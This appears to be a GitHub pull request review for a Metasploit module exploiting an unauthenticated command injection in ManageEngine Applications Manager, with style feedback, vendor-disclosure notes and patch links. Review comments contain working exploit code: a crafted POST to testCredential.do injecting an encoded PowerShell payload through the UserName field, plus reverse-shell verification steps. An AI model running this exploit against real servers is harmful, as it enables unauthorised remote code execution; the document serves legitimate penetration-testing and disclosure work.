-
Notifications
You must be signed in to change notification settings - Fork 14.3k
Adding ManageEngine Application Manager RCE #9684
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Conversation
|
This was my first time to using rubocop. I don't know how to fix following erros. Those errors are mostly related with indentation of parameters of Any idea how to fix them too ? or ignore by updating .rubocop.yml file ? |
|
@mmetince: You can read about the layout cops at https://rubocop.readthedocs.io/en/latest/cops_layout/. You can also read its parent doc at https://github.com/bbatsov/ruby-style-guide. Cheers! |
|
Thanks @wvu-r7, I've solved em all. 👍 |
| Go to following website and download Windows version of the product. It comes with built-in Java and Postgresql so you don't need to install anything else. | ||
| [https://www.manageengine.com/products/applications_manager/download.html](https://www.manageengine.com/products/applications_manager/download.html) | ||
|
|
||
| ## Verification Steps |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
These steps are a lie.
Consider:
1. Start `msfconsole`
2. `use exploit/windows/http/manageengine_appmanager_exec`
3. Set `RHOST <RHOST>`
4. Set `PAYLOAD windows/meterpreter/reverse_tcp`
5. Set `LHOST <LHOST>`
6. Run `check`
7. **Verify** that you are seeing `The target is vulnerable.` in console.
8. Run `exploit`
9. **Verify** that you are seeing `Triggering the vulnerability` in console.
10. **Verify** that you are seeing `Sending stage to <TARGET>` in console.
11. **Verify** that you have your shell.There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Ups sorry. I forgot to update from another module.
| 'isAgentAssociated' => 'false', | ||
| 'displayname' => Rex::Text.rand_text_alpha(10), | ||
| 'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems... | ||
| 'Version' => '2013', |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Does 2013 need to be static?
| 'montype' => 'OfficeSharePointServer', | ||
| 'isAgentEnabled' => 'NO', | ||
| 'isAgentAssociated' => 'false', | ||
| 'displayname' => Rex::Text.rand_text_alpha(10), |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Randomization for the win:
'displayname' => Rex::Text.rand_text_alpha(rand(10..15)),|
|
||
| print_status('Triggering the vulnerability') | ||
|
|
||
| send_request_cgi( |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Does the server return a response when exploitation is successful, or does triggering the payload cause the request to timeout?
If the server returns a response, it might be nice to validate the response and print an appropriate message.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Nope, since this command injection issue a request that exploits the vulnerability will be hanging on.
| ) | ||
| end | ||
|
|
||
| def check |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Perhaps I missed something, but it looks like the HTTP request in the check method and exploit method are almost identical, with the exception of the UserName.
You could create a new method which takes a username parameter and returns the result of the send_request_cgi call, then call this method from both the check method and exploit method.
Not required, but it's nice to be DRY :)
Something like this:
def test_credential(username)
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'testCredential.do'),
'vars_post' => {
'method' => 'testCredentialForConfMonitors',
'type' => 'OfficeSharePointServer',
'montype' => 'OfficeSharePointServer',
'isAgentEnabled' => 'NO',
'isAgentAssociated' => 'false',
'displayname' => Rex::Text.rand_text_alpha(rand(10..15)),
'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...
'Version' => '2013',
'Powershell' => 'True', # :-)
'CredSSP' => 'False',
'SPType' => 'SPServer',
'CredentialDetails' => 'nocm',
'Password' => Rex::Text.rand_text_alpha(rand(3..10)),
'UserName' => username
}
)
end
def check
res = test_credential(Rex::Text.rand_text_alpha(rand(3..10)))
unless res
vprint_error('Connection failed')
return CheckCode::Unknown
end
if res.body.include?('Kindly check the credentials and try again')
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def exploit
powershell_options = {
encode_final_payload: true,
remove_comspec: true
}
p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options)
print_status('Triggering the vulnerability')
test_credential("$(#{p})")
endThere was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Couldn't agree more. Done^^
|
While letting the vendor know about this bug, I notice that their bug bounty calls it Applications Manager (note the plural). Just fyi. I wonder how many of our modules are incorrect. |
|
There, let the vendor know, they're tracking it as ZVE-2018-0492, in case you haven't done this already, @mmetince |
|
@todb-r7 thanks. It seem they released a patch. https://pitstop.manageengine.com/portal/community/topic/security-vulnerability-issues-fixed-upgrade-to-the-latest-version-of-applications-manager |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Left a comment but it's a tiny nit to pick. We probably need to grep through the other modules for this inconsistency, so don't consider this a hold up.
| super(update_info(info, | ||
| 'Name' => "ManageEngine Applications Manager Remote Code Execution", | ||
| 'Description' => %q( | ||
| This module exploits command injection vulnerability in the ManageEngine Application Manager product. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Should be Applications Manager, not Application Manager (apparently)
|
I will replace "application" with "applications", thank you very much @todb-r7. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
A couple tiny nitpicks with the grammar in the description.
It may also be worth adding the
[ 'BID' => '103358' ]
and patch URL
[ 'URL' => 'https://pitstop.manageengine.com/portal/community/topic/security-vulnerability-issues-fixed-upgrade-to-the-latest-version-of-applications-manager' ]
to the References array.
Approved, but untested.
|
Love ManageEngine vulns. |
|
Works for me: |
Release NotesThe exploits/windows/http/manageengine_appmanager_exec module has been added to the framework. It exploits command injection vulnerability in the ManageEngine Application Manager product. An unauthenticated user can execute an operating system command under the context of a privileged user. |
This module exploits command injection vulnerability -0day as far as I know- in the ManageEngine Application Manager product. An unauthenticated user can execute a operating system command under the context of privileged user.
A successful check of the exploit will look like this:
msfconsoleuse exploit/linux/http/securityonion_xplico_execRHOSTPAYLOAD windows/meterpreter/reverse_tcpLHOSTcheckThe target is vulnerable.in console.exploitTriggering the vulnerabilityin console.Sending stage (179779 bytes) to <TARGET>in console.Scenarios
Technical Details and Module Demo
https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/